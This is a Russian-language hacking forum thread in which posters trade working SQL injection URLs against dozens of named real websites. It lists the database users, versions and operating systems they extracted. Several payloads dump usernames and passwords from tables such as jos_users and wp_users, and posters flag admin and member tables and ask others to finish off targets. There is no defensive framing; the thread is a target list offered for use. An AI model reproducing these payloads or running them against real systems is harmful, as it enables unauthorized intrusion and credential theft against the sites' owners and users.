SQL Инъекции

Code:

http://www.vanphathung.com/index.php?opt=user&act=prj&obj=info&id=-1%20UNION%20SELECt%201,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29%20--+

PR:5
User: vanphathun_CJXPD@localhost
Database: vanphathun_OIEW
Version: 5.0.67-community

 

Code:

http://depts.washington.edu/chid/showprogram.php?id=19+union+select+1,2,3,4,5+--+

Version: 5.0.27-standard
User: [email protected]
Database: chid

И вот еще одна:

Code:

http://art.uga.edu/people.php?id=19+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+

Кто может раскрутите до конца, а то что-то не получается

 

Code:

http://www.atomicforce.info/News.php?ID=-999%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5%20--+

PR:5
User: [email protected]
Database: db251077112
Version: 4.0.27-max-log

 

http://konyvtar.barczi.elte.hu/index.php?page_ID=-16+union+select+1&attr_ID=3

user() : rgyfkweb
version() : 5.0.51a-24
database() : bggyk_honl
OS : Debian

-----------------------------------------------------------------------------

http://www.pernillesams.dk/emne.php?caseid=-233+union+select+1,2,3,4,5,6,7,8,9--

user() : [email protected]
version() : 5.0.84-log
database() : www_pernillesamsdk
OS : pc-linux-gnu

-----------------------------------------------------------------------------
http://www.logstor.com/showpage.php?pageid=-2135976+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48--

version() : 5.0.27-community-nt
OS : Windows

----------------------------------------------------------------------------

http://www.annonces-dz.com/index.php?catid=-192+union+select+1,2--

user() : annonces_classif@localhost
version() : 5.0.90-community-log
database() : annonces_dz
OS : Linux

есть таблица "adz_user"

----------------------------------------------------------------------------

http://www.icewarm.com.au/page.php?pId=-227+union+select+1,2,3--

user() : dbwwwadmin@localhost
version() : 4.1.21
database() : icewarm
OS : slackware-linux

---------------------------------------------------------------------------
http://www.bahamascoop.org/article.php?es_id=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

user() : coop_coop@localhost
version() : 5.0.90-community-log
database() : coop_bahamascoop
OS : Linux

---------------------------------------------------------------------------

http://www.destinations.com.bs/package.php?es_id=-63+union+select+1,null,3,2,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

user() : destinations@localhost
version() : 5.0.32-Debian_7etch6-log
database() : destinations_com_bs_-_cms
OS : Debian

есть таблицы "esnm_admin" "esnm_members"

--------------------------------------------------------------------------
http://www.mortarinvestments.eu/vehicle.php?id=-158+union+select+1,2,3,4,5,6,7,8--

user() : [email protected]
version() : 5.1.42-log
database() : zbozi_mortarinvestments_eu
OS : Linux

-------------------------------------------------------------------------

http://www.drinkaware.ie/index.php?sid=7&pid=-84+union+select+1,2,3,4,5,6,7--

user() : [email protected]
version() : 5.0.45-community-log
database() : eas51_pixel
OS : pc-linux-gnu

результат в сорцах!

-------------------------------------------------------------------------

http://www.fourcourtspress.ie/product.php?intProductID=-292+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

user() : [email protected]
version() : 5.0.45-community-log
database() : fourcou_easyedit
OS : pc-linux-gnu

-------------------------------------------------------------------------
http://www.mcaleesemarine.com/boat-spec.php?id=-1008005+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62

user() : qtnvyqvd_mcalees@localhost
version() : 4.1.22-standard
database() : qtnvyqvd_main
OS : pc-linux-gnu

есть таблица "users"

------------------------------------------------------------------------

http://www.atireland.ie/aaate/php/people.php?id=6+and+substring(version(),1,1)=3

version() : 3

columns: 6

-----------------------------------------------------------------------
http://www.cultura2007.ro/document.php?doc=-2+union+select+1,2,3,4,5,6,7,8,9--

user() : root@localhost
version() : 5.0.22-community-nt
database() : cultura2007-ro
OS : Windows

-------------------------------------------------------------------------------
http://www.agenciapulsar.org/seccion.php?ids=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

user() : [email protected]
version() : 5.0.22-log
database() : agenciapulsar
OS : pc-linux-gnu

есть таблица "piwik_user"

-------------------------------------------------------------------------------

http://www.cmtv.com.ar/biografia/show.php?bnid=-37+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

user() : uv5639@localhost
version() : 5.0.51a-log
database() : uv5639_cmtv_web
OS : Linux
-------------------------------------------------------------------------------

http://www.estaciontierra.com/artistas/artista.php?id=-36+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

user() : estacion_usuario@localhost
version() : 5.0.90-community
database() : estacion_estaciontierra
OS : Linux

 

Code:

http://www.venen-kur.info/index.php?id=1319&lang=-1%20UNION%20SELECT%201,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4%20--+

User: [email protected]
Database: db242799363
Version: 5.0.81-log

 

Code:

http://www.zipp.com/about/story.php?ID=-324+UNION+SELECT+1,2,3,4,5,6,7,8--

User: zipp@localhost
Version: 5.0.86
Database: Zipp

Google PR: 5

Code:

http://www.bzpower.com/story.php?ID=-2818+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

User: bzpower_bzpower@localhost
Version: 5.0.67-community
Database: bzpower_bzdatabase

Google PR: 5

 

Хз, хз. И гугл, и поиск по форуму молчат

Code:

http://www.thaiware.com/main/info.php?id=-100500%20UnIon+selECt+1,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+--+

PR:6
User: 4ever@localhost
Database: thaiware
Version: 4.1.22

Code:

http://estanet.info/details.php?section=wtar&id=-9000%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7%20--+

User: root@localhost
Database: website_db
Version: 5.0.51a-community

Code:

http://www.globalaab.com/aab/info/info_information_look.php?id=-999%20UNION%20SELECT%201,2,3,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17%20--+

PR: 4
User: [email protected]
Database: zm21d1_db
Version: 4.0.27-log

Code:

http://www.chleb.info.pl/index.php?id=49%20UNION%20SELECT%201,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5%20--+

PR: 4
User: [email protected]
Database: chleb_chleb
Version: 5.0.90-log

 

Code:

http://www.sultan-backparadies.de/show_prod.php?id=-688+union+select+1,2,concat_ws(0x3a%20,user(),database(),version()),4,5,6,7,8,9/*

User: v099757@localhost
Version: 4.0.24-Max-log
Database: v099757

 

iraninter@localhost:4.1.22:iraninterlink

 

http://www.discountcardubai.com/news_desc.php?id=-105+union+select+1,2,3,4,5,6--

user() : solitair_mdbuser@localhost
version() : 5.1.45-log
database() : solitair_discountdata
OS : CentOS

есть таблицы "admin" "member" (User_Name,Password)

 

Code:

http://aspect.dubna.ru/english/news.php?id=-55+union+select+concat(version(),0x20,database(),0x20,user())--

5.0.51a-log
aspect
aspect@localhost

Code:

http://sexicq.ru/topic.php?id=-61+union+select+1,concat(login,0x20,passw),3,4,5,6,7+from+user--

 

Code:

http://www.beaux-artsbrampton.com/members.php?id=999999+union+select+1,2,3,concat_ws(0x3a%20,user(),database(),version()),5,6,7,8,9--

User: beaux2_babadmin@localhost
Version: 5.0.89.
Database: beaux2_babdb

 

http://aquascope.ru/modules/wfsection/article.php?articleid=-288+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*


Database Version: 4.1.22-max-log
Database name: uaquas19
User name: [email protected]
Os : linux

 

Code:

http://www.islam.az/modules/sections/index.php?op=viewarticle
post
artid=19+and+1=2+union+select+1,2,uname,4,5,pass,7,8,9,email+from+rus_users

 

Code:

http://www.djjohnaskew.com/prev_playlists.php?ID=-196+union+select+1,concat_ws(0x3a%20,user(),database(),version()),3

User: [email protected]
Version: 5.0.81-log
Database: db196056176

 

Code:

http://www.hbs-guu.ru/news.html?item_id=-74+UNION+SELECT+1,2,3,4,5,6--

User: hbs-guu@localhost
Version: 5.0.67-0ubuntu6.1-log
Database: hbs-guu

Google PR: 5

Code:

http://www.thaiware.com/main/info.php?id=-9307+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--

User: 4ever@localhost
Version: 4.1.22
Database: thaiware

Google PR: 6

Code:

http://www.smeda.org/info.php?id=-207+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

User: root@localhost
Version: 5.0.90-log
Database: smeda_main01

Google PR: 6

 

Code:

http://fei.idgu.edu.ua/info.php?sp=9+union+select+1,2,group_concat%28table_name%29,4+from+information_schema.tables--

 

ну что-ж, поддержим сегодня религиозную тему))

Code:

http://www.russk.ru/viewmessage.php?id=166990+union+select+1,database(),3,version(),user(),6%20--

database: rusk
version: rusk_site@localhost
user: 5.0.51a-log

pr: 4

 

Code:

http://www.sotchi-2014.info/content.php?id=248%27%20UNION%20SELECT%20concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29%20--+

User: Uwww4973S@localhost
Database: udb4973
Version: 4.0.26-log

 

Code:

http://www.kosherconnection.com/memberinfo.php?id=-123+union+select+1,concat(username,0x20,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+jos_users--

Code:

http://www.oiwsba.com/oiwsba/memberinfo.php?id=-44+union+select+1,concat(username,0x20,password),3,4,5,6,7,8,9,10,11,12+from+members--

Code:

http://www.wfsj.org/blogs/wfsj/post.php?id=-101+union+select+1,2,3,4,5,concat(version(),0x20,database(),0x20,user()),7,8,9--

5.1.26-rc-5.1.26rc
db70882_wfsj_org
[email protected]

Code:

http://lotakambal.sristisukh.com/post.php?id=-823+union+select+concat(version(),0x20,database(),0x20,user()),2,3,4,5,6,7--

Code:

http://www.thegotomom.com/blog-post.php?id=-108+union+select+1,concat(version(),0x20,database(),0x20,user()),3,4,5--

5.0.90-community
thegotom_momdb
thegotom_momdb@localhost

Code:

http://www.centraldev.net/post.php?id=-61+union+select+1,concat(user_login,0x20,user_pass),3,4,5,6,7,8,9,10+from+wp_users--

Code:

http://www.spsptrainingcommittee.org/post.php?id=-1+union+select+1,concat(version(),0x20,database(),0x20,user()),3,4--

5.0.67.d7-ourdelta-log
spsptraining
[email protected]

Code:

http://www.codepinkmaui.org/post.php?id=-18+union+select+1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8--

5.0.90-community
maui_pink
maui_pink@localhost

Code:

http://www.7courier.com/shopping.php?id=-27+union+select+concat(version(),0x20,database(),0x20,user()),2,3,4,5,6,7--

5.1.45-log
sevcouri_7couri
sevcouri_sevc@localhost

Code:

http://nocona.org/shopping.php?id=-1+union+select+1,2,concat(version(),0x20,database(),0x20,user()),4,5,6,7,8,9--

4.0.16-nt
nocona
nocona@webserver2

Code:

http://www.iblist.com/users/profile_view.php?id=361+union+select+1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--